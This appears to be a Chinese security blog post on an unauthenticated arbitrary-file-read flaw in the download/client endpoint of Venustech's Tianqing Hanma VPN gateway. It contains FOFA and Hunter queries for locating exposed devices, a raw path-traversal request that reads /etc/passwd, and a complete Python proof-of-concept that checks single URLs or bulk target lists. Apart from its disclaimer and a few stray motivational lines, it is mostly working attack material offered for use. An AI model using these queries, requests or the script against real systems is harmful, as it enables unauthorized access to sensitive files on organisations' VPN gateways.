声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
漏洞描述
天清汉马VPN安全网关系统产品是启明星辰集团依靠雄厚的技术优势,依靠多年信息安全产品研发的积累,严格遵照国家有关主管部门的设计规范要求,具有完全自主知识产权的SSL/IPSec 二合一VPN安全网关系统,为用户提供安全的传输链路加密服务。其download/client
接口处存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。
漏洞复现
1)信息收集
fofa:app="网御星云-VPN" || (body="select_auth_method" && body="select_auth_input") || app="启明星辰-天清汉马VPN"
hunter:app.name=="启明星辰天清汉马 VPN"||(body="select_auth_method"&&body="select_auth_input")||web.icon="ab09fbf7665449fc97bf31a8abcc36e6"
对于事情的预期越低,失败的时候越不伤心,成功的时候就越快乐。
2)构造数据包
GET /vpn/user/download/client?ostype=../../../../../../../etc/passwd HTTP/1.1
Host:ip
回显内容包含passwd文件,漏洞存在。
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
import ssl
from urllib3.exceptions import InsecureRequestWarning
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager
RED = '\033[91m'
RESET = '\033[0m'
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
class TlsAdapter(HTTPAdapter):
def init_poolmanager(self, *args, **kwargs):
ctx = ssl.create_default_context()
ctx.set_ciphers('ALL:@SECLEVEL=1')
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
kwargs['ssl_context'] = ctx
return super(TlsAdapter, self).init_poolmanager(*args, **kwargs)
def check_vulnerability(url):
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'
}
file_read_url = f"{url.rstrip('/')}/vpn/user/download/client?ostype=../../../../../../../etc/passwd"
session = requests.Session()
session.mount('https://', TlsAdapter())
try:
response = session.get(file_read_url, headers=headers, verify=False, timeout=30)
if response.status_code == 200 and "root" in response.text:
print(f"{RED}URL [{url}] 存在启明星辰天青汉马VPN-download-client-任意文件读取漏洞{RESET}")
else:
print(f"URL [{url}] 可能不存在漏洞")
except requests.RequestException as e:
print(f"URL [{url}] 请求失败: {e}")
def main():
parser = argparse.ArgumentParser(description='检测目标地址是否启明星辰天青汉马VPN-download-client-任意文件读取漏洞')
parser.add_argument('-u', '--url', help='指定目标地址')
parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
args = parser.parse_args()
if args.url:
if not args.url.startswith("http://") and not args.url.startswith("https://"):
args.url = "http://" + args.url
check_vulnerability(args.url)
elif args.file:
with open(args.file, 'r') as file:
urls = file.read().splitlines()
for url in urls:
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
check_vulnerability(url)
if __name__ == '__main__':
main()
运行截图
热爱是引领前进的第一动力。